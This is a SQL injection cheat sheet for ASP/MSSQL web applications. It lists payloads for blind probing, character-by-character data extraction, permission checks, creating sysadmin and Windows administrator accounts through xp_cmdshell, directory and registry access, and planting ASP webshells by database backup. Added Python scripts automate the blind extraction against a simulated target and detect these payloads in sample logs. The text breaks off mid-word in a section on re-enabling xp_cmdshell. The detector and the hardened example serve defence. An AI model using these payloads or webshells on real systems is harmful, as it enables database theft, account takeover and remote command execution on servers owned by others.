Author:System_Exp
For example, if a page looks up a record by its id parameter and the user submits 50 and 1=1 in place of 50, an application that does not filter the parameter concatenates it straight into the SQL statement and executes it, so the database can be probed directly. SQL injection is most common in ASP programs. The statements below are the usual sequence; each one is appended to the injected parameter.
1. Determine whether injection exists (the first keeps the record on the page, the second makes it disappear):
;and 1=1
;and 1=2
2. Determine whether it is MSSQL (comparing the built-in user name with an integer raises a conversion error that also leaks the login name):
;and user>0
3. Determine the database system:
;and (select count(*) from sysobjects)>0     -- MSSQL
;and (select count(*) from msysobjects)>0    -- Access
4. When the injection parameter is a string (quoted in the query), close the string first and re-open it at the end so the original closing quote still matches:
' and [query condition] and ''='
5. When a search parameter is not filtered (typically like '%keyword%'), use a URL-encoded percent sign so that it survives decoding and the trailing '%' of the original pattern closes the comparison:
' and [query condition] and '%25'='
6. Guess the table name:
;and (select count(*) from [table name])>0
7. Guess the column name:
;and (select count([column name]) from [table name])>0
8. Guess the length of the value in a column:
;and (select top 1 len([column name]) from [table name])>0
9. (1) Obtain the ASCII value of one character of the value (Access):
;and (select top 1 asc(mid([column name],1,1)) from [table name])>0
(2) Obtain the ASCII value of one character of the value (MSSQL):
;and (select top 1 unicode(substring([column name],1,1)) from [table name])>0
In steps 8 and 9 raise the number after > until the condition flips; a binary search over 0..127 settles each character in seven requests. Then step the start position of mid/substring through the value.
10. Test the permission structure (MSSQL; the trailing -- comments out the remainder of the original statement):
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
11. Add MSSQL and system accounts (stacked statements after ; work on MSSQL only; the procedures require sysadmin, and the net user commands additionally need the SQL Server service account to hold local administrator rights):
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,password,username;--        -- arguments: old password, new password, login
;exec master.dbo.sp_addsrvrolemember username,sysadmin;--     -- arguments: login, then role
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12. (1) Traverse directories (xp_dirtree returns two columns, subdirectory and depth, which is why the scratch table has two):
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in ('paths obtained in the previous step'))>0
Each comparison raises a conversion error whose message contains the next path; exclude the paths already seen to walk the list.
(2) Traverse directories, alternative:
;create table temp(id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- get all current drives
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- get the subdirectory list
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- get the directory tree of all subdirectories
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- view the file content
13. MSSQL extended stored procedures for the registry:
xp_regenumvalues root key, subkey
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'  -- returns every value under the key, one record set per value
xp_regread root key, subkey, value name
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'  -- returns the specified value
xp_regwrite root key, subkey, value name, value type, value
The value type is REG_SZ or REG_DWORD.
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName','reg_sz','hello'  -- writes the value
xp_regdeletevalue root key, subkey, value name
;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName'  -- deletes the value
xp_regdeletekey root key, subkey
;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'  -- deletes the key and all values under it
14. MSSQL backup creates a webshell:
use model
create table cmd (str image);
insert into cmd (str) values ('<% Dim oScript %>');
backup database model to disk = 'c:\l.asp';
The backup file is a binary dump of the small model database with the inserted ASP text embedded in it; IIS hands any .asp file to the script engine, which executes only what lies between <% and %> and ignores the surrounding bytes. The SQL Server service account must be able to write to the chosen path, so take the web root from the directory listing obtained in step 12.
15. MSSQL built-in functions (each comparison fails with a conversion error that prints the value):
;and (select @@version)>0       -- reveals the SQL Server build and the Windows version
;and user_name()='dbo'          -- true when the connection runs as sa / dbo
;and (select user_name())>0     -- reveals the login the application connects with
;and (select db_name())>0       -- reveals the current database
16. Simple webshell (same backup trick as step 14, with a page that runs the c parameter through cmd.exe under the IIS worker's identity):
use model
create table cmd (str image);
insert into cmd (str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk = 'g:\wwwtest\l.asp';
Once the file sits in the web root, commands are passed in the c parameter:
http://ip/l.asp?c=dir
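The enumeration sequence in steps 1 to 9 (probe, confirm, then read a value one character at a time) is normally automated. The following Python script is an added example, not part of the original cheat sheet: it simulates the vulnerable ASP page with SQLite so it runs offline, with an invented news/admin schema standing in for the target, and extracts a value by binary search on each character's code point. SQLite's length(), substr() and LIMIT 1 stand in for MSSQL's len(), substring() and TOP 1; the request counter shows the cost of the blind method. A parameterized version of the same page is included to show what stops the step 1 probe.

```python
import sqlite3

# Constructed sample data standing in for the target's database (not from the page).
SCHEMA = """
CREATE TABLE news(id INTEGER, title TEXT);
INSERT INTO news VALUES (50, 'hello');
CREATE TABLE admin(username TEXT, password TEXT);
INSERT INTO admin VALUES ('sa', 'Pa55w0rd');
"""


class Target:
    """Simulated ASP page over an in-memory database; counts requests so the
    cost of the blind attack is visible."""

    def __init__(self):
        self.con = sqlite3.connect(":memory:")
        self.con.executescript(SCHEMA)
        self.requests = 0

    def vulnerable_page(self, id_param):
        """The broken pattern from the text: the parameter is concatenated into
        the query with no filtering. Returns True if the record would be shown."""
        self.requests += 1
        sql = "SELECT title FROM news WHERE id=" + id_param  # injectable
        try:
            return self.con.execute(sql).fetchone() is not None
        except sqlite3.Error:
            return False  # error page; a blind attacker reads it as 'false'

    def safe_page(self, id_param):
        """Hardened version: validate the type, then bind it as a parameter."""
        self.requests += 1
        if not id_param.isdigit():
            return False
        sql = "SELECT title FROM news WHERE id=?"
        return self.con.execute(sql, (int(id_param),)).fetchone() is not None


def detect_injection(page):
    """Step 1: 'and 1=1' keeps the record while 'and 1=2' drops it."""
    return page("50 and 1=1") and not page("50 and 1=2")


def ask(page, condition):
    """One blind request: True iff the injected condition holds (steps 6-9)."""
    return page("50 and (" + condition + ")")


def binary_search(page, probe, lo, hi):
    """probe(v) builds a condition meaning 'value > v'. Narrow [lo, hi] until
    only the value itself remains: log2(hi - lo) requests instead of hi - lo."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(page, probe(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_length(page, table, column, max_len=64):
    """Step 8: and (select top 1 len(col) from tbl)>N, in SQLite spelling."""
    probe = lambda v: f"(select length({column}) from {table} limit 1)>{v}"
    return binary_search(page, probe, 0, max_len)


def extract_char(page, table, column, pos):
    """Step 9: compare the code point of character `pos` with a pivot; seven
    requests per character instead of up to 127 linear probes."""
    probe = lambda v: f"(select unicode(substr({column},{pos},1)) from {table} limit 1)>{v}"
    return chr(binary_search(page, probe, 0, 127))


def extract_value(page, table, column):
    """Steps 8 and 9 combined: length first, then one character at a time."""
    n = extract_length(page, table, column)
    return "".join(extract_char(page, table, column, i) for i in range(1, n + 1))


if __name__ == "__main__":
    t = Target()
    print("injectable:", detect_injection(t.vulnerable_page))
    print("hardened:  ", detect_injection(t.safe_page))
    pw = extract_value(t.vulnerable_page, "admin", "password")
    print("password:  ", pw, "in", t.requests, "requests")
```

An eight-character value costs about sixty requests this way; the same run against safe_page never gets past step 1, because the type check and the bound parameter leave the attacker's text no way to become SQL.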
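From the defender's side, every statement in the list above leaves a recognizable trace in the web server's request log. The detector below is an added example, not from the original page: it runs signatures derived from the payloads above over a few constructed IIS-style log lines (the layout is trimmed to date, time, client IP, method, URI stem, raw query string and status, with the query URL-decoded before matching) and groups hits by source address, because a blind extraction produces dozens of near-identical probes from one client even though each request on its own is low-value.

```python
import re
from collections import Counter, namedtuple
from urllib.parse import unquote_plus

# Signatures derived from the payload list above, matched against the
# lower-cased, URL-decoded query string.
SIGNATURES = {
    "boolean probe":       re.compile(r"\band\s+\d+\s*=\s*\d+"),
    "db fingerprint":      re.compile(r"\bm?sysobjects\b|\band\s+user\s*>\s*0"),
    "role check":          re.compile(r"\bis_(srvrole)?member\s*\("),
    "char extraction":     re.compile(r"\b(unicode|asc)\s*\(\s*(substring|mid)\s*\("),
    "login creation":      re.compile(r"\bsp_(addlogin|password|addsrvrolemember)\b"),
    "os command":          re.compile(r"\bxp_cmdshell\b"),
    "filesystem/registry": re.compile(r"\bxp_(dirtree|subdirs|availablemedia|reg\w+)\b"),
    "backup webshell":     re.compile(r"\bbackup\s+database\b.*\bto\s+disk\b"),
}
# Tags that mean the attacker is past enumeration and executing or persisting.
HIGH = {"login creation", "os command", "filesystem/registry", "backup webshell"}

# Constructed log lines (not real traffic) in a trimmed IIS W3C layout:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status; '-' is an empty query.
SAMPLE_LOG = """\
2004-03-01 10:00:01 203.0.113.7 GET /list.asp id=50 200
2004-03-01 10:00:02 203.0.113.7 GET /list.asp id=50+and+1%3D1 200
2004-03-01 10:00:02 203.0.113.7 GET /list.asp id=50+and+1%3D2 200
2004-03-01 10:00:03 203.0.113.7 GET /list.asp id=50+and+user%3E0 500
2004-03-01 10:00:04 203.0.113.7 GET /list.asp id=50+and+(select+count(*)+from+sysobjects)%3E0 200
2004-03-01 10:00:05 203.0.113.7 GET /list.asp id=50+and+(select+top+1+unicode(substring(password,1,1))+from+admin)%3E77 200
2004-03-01 10:00:06 203.0.113.7 GET /list.asp id=50+and+1%3D(select+IS_SRVROLEMEMBER('sysadmin'));-- 200
2004-03-01 10:00:07 203.0.113.7 GET /list.asp id=50;exec+master.dbo.xp_cmdshell+'net+user+hax+P%40ss+/add';-- 500
2004-03-01 10:00:08 203.0.113.7 GET /list.asp id=50;backup+database+model+to+disk%3D'c:%5Cl.asp';-- 500
2004-03-01 10:00:09 198.51.100.4 GET /search.asp q=brand+new+bikes 200
2004-03-01 10:00:10 198.51.100.4 GET /list.asp id=66 200
"""

Finding = namedtuple("Finding", "time source stem tags severity")


def parse_line(line):
    """Split one log line into a record; '-' means an empty query string."""
    date, time, c_ip, method, stem, query, status = line.split()
    return {"time": date + " " + time, "source": c_ip, "method": method,
            "stem": stem, "query": "" if query == "-" else query, "status": status}


def classify(query):
    """Return the names of every signature that fires on the decoded query."""
    decoded = unquote_plus(query).lower()
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def severity(tags):
    return "high" if HIGH.intersection(tags) else "low"


def scan(lines):
    """One Finding per log line on which at least one signature fires."""
    findings = []
    for line in lines:
        if not line.strip() or line.startswith("#"):  # W3C directive lines
            continue
        rec = parse_line(line)
        tags = classify(rec["query"])
        if tags:
            findings.append(Finding(rec["time"], rec["source"], rec["stem"], tags, severity(tags)))
    return findings


def noisy_sources(findings, threshold):
    """Rank source addresses by hit count: the step 8-9 extraction loop shows up
    as a burst of 'low' hits from one client, which is worth an alert on its own."""
    counts = Counter(f.source for f in findings)
    return [ip for ip, n in counts.most_common() if n >= threshold]


if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for f in found:
        print(f.time, f.source, f.severity.upper(), ", ".join(f.tags))
    print("sources over threshold:", noisy_sources(found, 5))
```

Decoding before matching matters: the payloads arrive with + or %20 for spaces and %3D for =, and the step 5 trick relies on a double-encoded percent sign, so a detector that matches the raw query string misses most of the list.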
Manual SQL Injection
Required tools: SQL Query Analyzer and SqlExec Sunx Version.
1. To remove the xp_cmdshell extended stored procedure, use the following statement:
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
2. To add the xp_cmdshell extended stored procedure back (it is implemented by xplog70.dll in the SQL Server binn directory), use the following statement:
(1) In SQL Query Analyzer:
sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'
(2) First in SqlExec Sunx Versi